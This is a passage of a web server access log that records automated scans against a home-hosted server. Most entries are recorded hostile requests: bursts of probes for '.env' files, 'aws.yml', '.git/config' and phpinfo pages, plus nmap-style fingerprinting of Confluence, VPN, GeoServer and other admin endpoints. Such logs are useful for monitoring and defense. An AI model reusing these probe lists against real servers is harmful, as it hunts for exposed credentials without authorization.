+[17/Jan/2026:02:16:20 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:20:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 150.241.87.73] [Length 568] [Gzip 1.86] "Linux Gnu (cow)" "-" +[17/Jan/2026:02:24:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9.0.3) Gecko/2008092515 Ubuntu/8.10 (intrepid) Firefox/3.0.3" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8" "-" +[17/Jan/2026:02:25:30 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5;MSN 11;MSN 11.5; MSNbMSNI; MSNmen-us; MSNcOTH) like Gecko" "-" +[17/Jan/2026:02:25:30 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.151] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; ko-KR) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/debug/default/view?panel=config" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1) Gecko/20061010 Firefox/2.0" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/images/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/.env.save.1" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; fr-fr) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/.json" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i386; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/library/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SM-G900V Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/API/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/client/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 OPR/42.0.2393.517" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/blogs/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/602.1.27 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.15" "-" +[17/Jan/2026:02:25:31 +0000] 404 - GET http 92.249.249.197 "/settings/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.1 Safari/532.2" "-" +[17/Jan/2026:02:25:32 +0000] 404 - GET http 92.249.249.197 "/.env.prod" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8.0.8) Gecko/20061115 Ubuntu/dapper-security Firefox/1.5.0.8" "-" +[17/Jan/2026:02:25:32 +0000] 404 - GET http 92.249.249.197 "/html/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3" "-" +[17/Jan/2026:02:25:32 +0000] 404 - GET http 92.249.249.197 "/aws.yml" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SCH-R530U Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[17/Jan/2026:02:25:32 +0000] 404 - GET http 92.249.249.197 "/apis/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; MASMJS)" "-" +[17/Jan/2026:02:25:32 +0000] 404 - GET http 92.249.249.197 "/stage/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) CriOS/64.0.3282.112 Mobile/15D100 Safari/604.1" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/auth/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/env.txt" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.0.8) Gecko/20061213 Firefox/1.5.0.8" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/test.php" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 7.0; SM-N920V Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/platform/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/data/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Opera/9.26 (Windows NT 5.1; U; de)" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/www/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; BOIE9;ENUSMSNIP; rv:11.0) like Gecko" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/developer/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/home/.env" [Client 78.153.140.151] [Length 552] [Gzip -] "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; EIE10;ENUSMSN)" "-" +[17/Jan/2026:02:25:33 +0000] 404 - GET http 92.249.249.197 "/media/.env" [Client 78.153.140.151] [Length 150] [Gzip -] "Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; zh-cn) Opera 8.65" "-" +[17/Jan/2026:02:45:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:53:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:02:54:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.155.90.220] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[17/Jan/2026:03:11:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:03:20:45 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:03:24:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:03:26:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 4.227.89.40] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[17/Jan/2026:03:36:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[17/Jan/2026:03:38:28 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 77.83.39.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[17/Jan/2026:03:44:38 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:03:44:47 +0000] 400 - GET http localhost "/" [Client 172.234.162.31] [Length 252] [Gzip -] "-" "-" +[17/Jan/2026:03:44:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/start.cfm" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nmaplowercheck1768621483" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:47 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:03:44:47 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "-" "-" +[17/Jan/2026:03:44:47 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:47 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nmaplowercheck1768621484" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 400 - GET http localhost "/" [Client 172.234.162.31] [Length 252] [Gzip -] "-" "-" +[17/Jan/2026:03:44:51 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 400 - POST http 92-249-249-197.pool.digikabel.hu "/sdk" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/rest/applinks/1.0/manifest" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nmaplowercheck1768621484" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/evox/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/home.aspx" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:51 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/HNAP1" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/user" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/CFIDE/componentutils/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/indice.shtml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/confluence/rest/applinks/1.0/manifest" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/HNAP1" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 172.234.162.31] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/webui" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/default.jhtml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/login.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/CFIDE/componentutils/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dniapi/userInfos" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dana-na/nc/nc_gina_ver.txt" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:52 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/index.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/main.asp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/Account/Login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/index.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/ise/img/rm-logo_small.png" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/Account/Login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/webui" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:44:53 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin.jsp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:53 +0000] 404 - POST http 92-249-249-197.pool.digikabel.hu "/sdk" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/xml/info.xml" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/check-version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/magento_version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/images/logo.png" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/webui" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/start.shtml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cluster/list.query" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xml/info.xml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:54 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/info.cgi" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/phoenix/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/server/version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/magento_version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 